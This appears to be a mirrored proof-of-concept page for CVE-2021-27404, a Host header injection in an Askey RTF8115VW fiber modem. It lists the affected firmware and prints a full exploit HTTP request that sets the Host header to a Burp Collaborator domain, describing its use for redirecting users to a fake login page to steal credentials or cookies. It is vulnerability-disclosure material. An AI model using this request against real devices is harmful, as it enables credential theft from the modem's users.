CVE-2021-27404 PoC — Fastweb Askey RTV1907VW 输入验证错误漏洞

Source

Associated Vulnerability

Description

HostHeaderInjection-Askey

Readme

**Authenticated Host Header Injection - Askey Internet Fiber Modem**

Vendor: **Askey**   
Software Version: **BR_SV_g11.11_RTF_TEF001_V6.54_V014**  
Model: **RTF8115VW**   
Vulnerable Header: **Host**  
Not tested in other model/version.   

Impact: An attacker could take advantege on that vulnerability to redirect user to a fake Login page in order to extract his credentials, or cookies.

The Final Request
```
GET / HTTP/1.1
Host: kay4tb35bh55y38n8h4teim21t7jv8.burpcollaborator.net
Cookie: _httpdSessionId_=7924107467ea5838a196b65306ca7236
Upgrade-Insecure-Requests: 1
Referer: http://x.x.x.x/cgi-bin/te_logout.cgi
Accept: */*
Accept-Language: en-US,en-GB;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.150 Safari/537.36
Connection: close
Cache-Control: max-age=0
Accept-Encoding: gzip, deflate
```





![Alt text](/hostHeaderInjection.jpg?raw=true "Optional Title")
 

File Snapshot

 [4.0K]  /data/pocs/9d95d73cf449508839adaf4ed523630747da4ea7
├── [161K]  hostHeaderInjection.jpg
└── [ 955]  README.md

0 directories, 2 files

Remarks